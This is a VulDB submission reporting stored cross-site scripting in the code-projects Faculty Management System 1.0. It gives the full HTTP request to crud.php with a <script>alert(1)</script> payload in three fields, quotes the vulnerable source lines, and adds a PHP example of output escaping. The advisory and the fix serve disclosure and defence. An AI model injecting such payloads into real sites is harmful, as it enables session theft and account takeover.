Submit #255788: code-projects.org Faculty Management System 1 Stored Cross-Site Scripting

Title: code-projects.org Faculty Management System 1 Stored Cross-Site Scripting
Description: Stored XSS in http://localhost/gan/admin/pages/subjects.php.
Vulnerable software: https://code-projects.org/faculty-management-system-in-php-with-source-code/
Vulnerable request:

POST /gan/admin/php/crud.php HTTP/1.1
Host: localhost
Content-Length: 112
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/gan/admin/pages/subjects.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: fusion7k868_session=0qfpifmqa21t89g6fft0a53hs9; fusion7k868_visited=yes; REFERRER=http%3A%2F%2Flocalhost%2Forangescrum-main%2F; user_uniq_agent=81fa84b75a8024ba76b34e57df459f314694749926581a53872d4b; USERSUB_TYPE=0; IS_MODERATOR=0; SES_ROLE=1; FIRST_INVITE_2=1; CPUID=ac57356acee38e7adfdfe2af0a14fe91; CURRENT_FILTER=cases; DEFAULT_PAGE=dashboard; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; helpdesk_uniq_agent=-1; PHPSESSID=n7ed4n8j05ckj8m7f8npi75pd5
Connection: close

action=add-subject&code=<script>alert(1)</script>&desc=<script>alert(1)</script>&units=<script>alert(1)</script>

Vulnerable file: admin/php/crud.php
Lines: 63-66

$code = sanitized($_POST['code']);
$desc = sanitized($_POST['desc']);
$units = sanitized($_POST['units']);
$data = array('subj_code'=>$code,'subj_desc'=>$desc,'units'=>$units);
Source: https://drive.google.com/file/d/1XDGcSRytGV11YWuhIuW_4GvD7kEpgjZT/view?usp=sharing
User: kerkroups (UID 59969)
Submission: 12/20/2023 18:31 (2 years ago)
Moderation: 12/21/2023 17:17 (23 hours later)
Status: Accepted
VulDB entry: 248743 [code-projects Faculty Management System 1.0 subjects.php Description/Units cross site scripting]
Points: 20
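Added defensive illustration, not code from the Faculty Management System or from the submitter: whatever sanitized() does to the request input, the page that prints the stored subj_code, subj_desc and units values must HTML-escape them on output. The helpers e() and render_subject_row() and the sample row are assumptions made for this example.

```php
<?php
// Added example (hypothetical, not the project's code): escape stored subject
// fields at render time so a payload saved through crud.php's add-subject action
// cannot execute when subjects.php displays it.
declare(strict_types=1);

/** HTML-escape a value for insertion into element text or a quoted attribute. */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Reject a units value that is not a small non-negative integer (assumed rule). */
function validate_units(string $units): ?int
{
    $n = filter_var($units, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0, 'max_range' => 20]]);
    return $n === false ? null : $n;
}

/** Render one subject as a table row with every stored field escaped. */
function render_subject_row(array $subject): string
{
    return '<tr>'
        . '<td>' . e((string) $subject['subj_code']) . '</td>'
        . '<td>' . e((string) $subject['subj_desc']) . '</td>'
        . '<td>' . e((string) $subject['units']) . '</td>'
        . '</tr>';
}

// Constructed sample row: the advisory's payload stored in all three fields
// (field names follow the $data array quoted from crud.php lines 63-66).
$stored = [
    'subj_code' => '<script>alert(1)</script>',
    'subj_desc' => '<script>alert(1)</script>',
    'units'     => '<script>alert(1)</script>',
];

$html = render_subject_row($stored);

// With output escaping in place no raw tag reaches the browser, and the
// non-numeric units value would have been rejected at write time.
assert(strpos($html, '<script>') === false);
assert(validate_units($stored['units']) === null);
assert(validate_units('3') === 3);
echo $html, PHP_EOL;
```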
